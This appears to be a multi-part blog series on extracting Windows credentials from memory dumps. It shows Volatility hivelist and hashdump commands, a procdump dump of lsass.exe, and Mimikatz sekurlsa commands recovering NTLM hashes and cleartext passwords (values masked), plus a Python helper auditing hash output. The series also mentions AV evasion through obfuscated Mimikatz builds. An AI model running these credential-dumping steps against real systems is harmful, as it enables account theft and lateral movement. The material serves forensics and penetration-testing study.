Memdumps, Volatility, Mimikatz, VMs – Part 2: Windows 7 Full Memory Dump & Get Hashes

For this part we first take a full memory dump with the Moonsols DumpIt.exe tool (on my physical Windows 7 x64 machine):
The next steps are simple volatility calls, like getting the basic image information:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f DAXAMD-20160124-111555.raw imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (C:\Users\dax\Downloads\volatility_2.5.win.standalone\DAXAMD-20160124-111555.raw)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002ff20f0L
          Number of Processors : 2
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002ff3d00L
                KPCR for CPU 1 : 0xfffff880009e8000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-24 11:16:03 UTC+0000
     Image local date and time : 2016-01-24 12:16:03 +0100
Get the hivelist (the virtual offsets of the SYSTEM and SAM hives are needed in the next step):
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f DAXAMD-20160124-111555.raw hivelist --profile Win7SP1x64
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
------------------ ------------------ ----
0xfffff8a00000f010 0x0000000153e5d010 [no name]
0xfffff8a0000231f0 0x0000000153e1f1f0 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000062010 0x0000000150d76010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000121010 0x0000000149c8e010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a000d55010 0x0000000148258010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a000e04200 0x000000013b7ad200 \SystemRoot\System32\Config\DEFAULT
0xfffff8a001219010 0x0000000132d35010 \SystemRoot\System32\Config\SECURITY
0xfffff8a001290010 0x0000000131e09010 \SystemRoot\System32\Config\SAM
0xfffff8a00143c010 0x000000012fa23010 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xfffff8a00151a240 0x000000012c2b9240 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xfffff8a002261010 0x000000010db7f010 \??\C:\Users\dax\ntuser.dat
0xfffff8a0022f6410 0x0000000148132410 \??\C:\Users\dax\AppData\Local\Microsoft\Windows\UsrClass.dat
0xfffff8a004e77010 0x0000000110fea010 \??\C:\System Volume Information\Syscache.hve
0xfffff8a00ceae010 0x000000007eeb9010 \??\C:\Windows\System32\config\COMPONENTS
Help!
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -h
Volatility Foundation Volatility Framework 2.5
Usage: Volatility - A memory forensics analysis platform.
Options:
  -h, --help            list all available options and their default values.
                        Default values may be set in the configuration file
                        (/etc/volatilityrc)
  --conf-file=.volatilityrc
                        User based configuration file
  -d, --debug           Debug volatility
  --plugins=PLUGINS     Additional plugin directories to use (semi-colon
                        separated)
  --info                Print information about all registered objects
  --cache-directory=C:\Users\dax/.cache\volatility
                        Directory where cache files are stored
  --cache               Use caching
  --tz=TZ               Sets the (Olson) timezone for displaying timestamps
                        using pytz (if installed) or tzset
  -f FILENAME, --filename=FILENAME
                        Filename to use when opening an image
  --profile=WinXPSP2x86
                        Name of the profile to load (use --info to see a list
                        of supported profiles)
  -l LOCATION, --location=LOCATION
                        A URN location from which to load an address space
  -w, --write           Enable write support
  --dtb=DTB             DTB Address
  --shift=SHIFT         Mac KASLR shift address
  --output=text         Output in this format (support is module specific, see
                        the Module Output Options below)
  --output-file=OUTPUT_FILE
                        Write output in this file
  -v, --verbose         Verbose information
  -g KDBG, --kdbg=KDBG  Specify a KDBG virtual address (Note: for 64-bit
                        Windows 8 and above this is the address of
                        KdCopyDataBlock)
  --force               Force utilization of suspect profile
  -k KPCR, --kpcr=KPCR  Specify a specific KPCR address
  --cookie=COOKIE       Specify the address of nt!ObHeaderCookie (valid for
                        Windows 10 only)
  -y SYS_OFFSET, --sys-offset=SYS_OFFSET
                        SYSTEM hive offset (virtual)
  -s SAM_OFFSET, --sam-offset=SAM_OFFSET
                        SAM hive offset (virtual)
Module Output Options: dot, greptext, html, json, sqlite, text, xlsx
---------------------------------
Module HashDump
---------------------------------
Dumps passwords hashes (LM/NTLM) from memory
What we need for getting the hashes are the two virtual offsets from the hivelist output:
-y = virtual offset of the SYSTEM hive (\REGISTRY\MACHINE\SYSTEM)
-s = virtual offset of the SAM hive (\SystemRoot\System32\Config\SAM)
Dump the hashes:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -f DAXAMD-20160124-111555.raw --profile Win7SP1x64 -y 0xfffff8a0000231f0 -s 0xfffff8a001290010
Volatility Foundation Volatility Framework 2.5
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
dax:1001:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
HomeGroupUser$:1002:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
otto:1007:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
__vmware_user__:1015:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
UpdatusUser:1016:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
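The two steps above (read the SYSTEM and SAM offsets out of hivelist, then audit the hashdump result) as a small added Python helper; this is my own example, not part of the original post or of Volatility. It assumes the Volatility 2.5 text layouts shown on this page; the hivelist lines are the page's own, the hashdump lines are constructed with made-up hex values, and the only real constants are the well-known empty LM and empty NT hash values.

```python
import re
# Well-known values of an empty LM hash and an empty NT hash
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# Lines taken from the hivelist output above (same layout as Volatility 2.5 prints)
HIVELIST_SAMPLE = r"""Virtual            Physical           Name
------------------ ------------------ ----
0xfffff8a00000f010 0x0000000153e5d010 [no name]
0xfffff8a0000231f0 0x0000000153e1f1f0 \REGISTRY\MACHINE\SYSTEM
0xfffff8a001290010 0x0000000131e09010 \SystemRoot\System32\Config\SAM
0xfffff8a002261010 0x000000010db7f010 \??\C:\Users\dax\ntuser.dat
"""
# Constructed pwdump-style hashdump lines; the non-empty hex values are made up
HASHDUMP_SAMPLE = f"""Administrator:500:{EMPTY_LM}:{EMPTY_NT}:::
dax:1001:{EMPTY_LM}:0123456789abcdef0123456789abcdef:::
otto:1007:ffffffffffffffffffffffffffffffff:fedcba9876543210fedcba9876543210:::
"""
HIVE_RE = re.compile(r"^(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(.+)$", re.I)

def hive_offsets(hivelist_text):
    """Pick the virtual offsets of the SYSTEM and SAM hives (for -y and -s)."""
    found = {}
    for line in hivelist_text.splitlines():
        m = HIVE_RE.match(line.strip())
        if not m:
            continue
        virt, _phys, name = m.groups()
        leaf = name.rsplit("\\", 1)[-1].upper()   # last path component
        if leaf in ("SYSTEM", "SAM") and leaf not in found:
            found[leaf] = virt
    return found

def audit_hashdump(text):
    """Flag accounts whose LM hash is still stored or whose NT hash is empty."""
    findings = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:          # user:rid:lm:nt::: expected
            continue
        user, lm, nt = parts[0], parts[2].lower(), parts[3].lower()
        issues = []
        if lm != EMPTY_LM:
            issues.append("LM hash stored")
        if nt == EMPTY_NT:
            issues.append("empty password")
        findings[user] = issues
    return findings
```

Accounts that still carry an LM hash (a sign that NoLMHash is not enforced) or an empty NT hash are the ones to fix first when the dump is reviewed as an audit.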
Link:

Memdumps, Volatility, Mimikatz, VMs – Part 1: Mimikatz & lsass.exe Dump

Part 1 is simple: dump the lsass.exe process and use mimikatz to get the credentials as clear text and as hashes. You need admin or SYSTEM rights for this.
But first, as a short reminder, let's have a look at the "normal" way of dumping credentials from the lsass.exe process with mimikatz:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
-- cut --
If you do not have a self-compiled or otherwise obfuscated mimikatz version, every antivirus scanner will do its work. But it is also possible to read the credentials from a memory dump.
Make a memory dump with Process Explorer:
… remember to make a full dump.
Or use procdump:
procdump -accepteula -ma lsass.exe lsass.dmp
which is much better for pentesters who only have shell access.
To dump the credentials in clear text, load the dump file in mimikatz:
mimikatz # sekurlsa::minidump e:\lsass.dmp
Switch to MINIDUMP : 'e:\lsass.dmp'
mimikatz # sekurlsa::logonPasswords
Opening : 'e:\lsass.dmp' file for minidump...
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
Domain            : DAX-RYMZ48Z3EYO
Logon Server      : DAX-RYMZ48Z3EYO
Logon Time        : 23.01.2016 14:42:11
SID               : S-1-5-21-436374069-688789844-839522115-1003
        msv :
         [00000002] Primary
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * LM       : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * NTLM     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * SHA1     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
        wdigest :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
        kerberos :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
-- cut --
Links:

Memdumps, Volatility, Mimikatz, VMs – Overview

Over the last few weeks I experimented with how to get user credentials from memory dumps, and hopefully I will have the time to continue this little "research" (I know, it is not really research when you just write up stuff 😉 ). There are many different ways to dump credentials as hashes or in cleartext from various types of memory dumps, so I think this will become a few short articles. I added links for sources and more in-depth information.
Highly interesting for me is how to obtain memory dumps from virtual machines when you have access to the host system. In a later part I will also have a look at countermeasures (by which I mean monitoring and logging).
Overview